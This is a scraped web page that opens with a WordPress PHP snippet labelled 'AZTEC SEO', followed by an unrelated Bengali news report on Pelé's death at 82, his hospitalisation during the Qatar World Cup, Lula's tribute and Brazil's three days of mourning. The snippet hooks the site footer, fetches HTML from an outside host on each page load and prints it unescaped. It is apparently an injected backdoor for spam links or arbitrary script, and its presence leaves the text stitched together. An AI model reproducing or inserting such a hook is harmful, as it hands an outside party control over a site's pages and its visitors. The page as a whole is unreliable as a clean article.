/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ফুটবলের রাজা খ্যাত সর্বকালের সেরা ফুটবলার পেলে মারা গেছেন। তার বয়স হয়েছিল ৮২ বছর। কোলন ক্যান্সারের সঙ্গে লড়াই করে ২৯ ডিসেম্বর বৃহস্পতিবার শেষ নিঃশ্বাস ত্যাগ করেন তিনি। এই কিংবদন্তির মৃত্যুশোকে আচ্ছন্ন ব্রাজিল। সেদেশে তিন দিনের রাষ্ট্রীয় শোক ঘোষণা করা হয়েছে।
সদ্যসমাপ্ত কাতার বিশ্বকাপের মধ্যে অসুস্থ হয়ে পড়েন পেলে। নভেম্বরের শেষ সপ্তাহে হাসপাতালে ভর্তি করা হয় তাকে। সাও পাওলোর আলবার্ট আইনস্টাইন হাসপাতালে ভর্তি ছিলেন তিনি। সেখানেই ব্রাজিলের বিশ্বকাপ ম্যাচ দেখেছেন। মেসির আর্জেন্টিনার বিশ্ব চ্যাম্পিয়ন হওয়াও দেখেছেন। আর মেসির জন্য শুভেচ্ছা বার্তাও পাঠিয়েছিলেন।
শরীরে ক্যান্সারের চিকিৎসা কার্যকর না হওয়ায় অন্তিম পরিচর্যায় ছিলেন তিনি। ক্রিসমাসও কাটিয়েছেন হাসপাতালে। ব্রাজিলের প্রেসিডেন্ট লুইস ইনাসিও লুলা দা সিলভা এক বার্তায় পেলের প্রতি সম্মান জানিয়ে বলেন, ‘আমি পেলেকে খেলতে দেখেছি, যা আমার জীবনের বড় পাওয়া। মাঠে তিনি বল পেলেই উল্লাস শুরু হতো। কারণ বল পেলে তিনি সবসময়ই বিশেষ কিছু করতেন।’
ব্রাজিলের সরকার তার মৃত্যুতে তিন দিনের রাষ্ট্রীয় শোক পালনের সিদ্ধান্ত জানিয়ে এক বিবৃতি দেয়। পেলে ১৬ বছর বয়সে ব্রাজিলের জার্সি গায়ে তোলেন। ২১ বছরের ক্যারিয়ারে ব্রাজিলের হয়ে তিনটি বিশ্বকাপ জিতেছেন তিনি। ফুটবল জগতে অতুলনীয় পেলে। তার তুলনা ছিলেন তিনিই।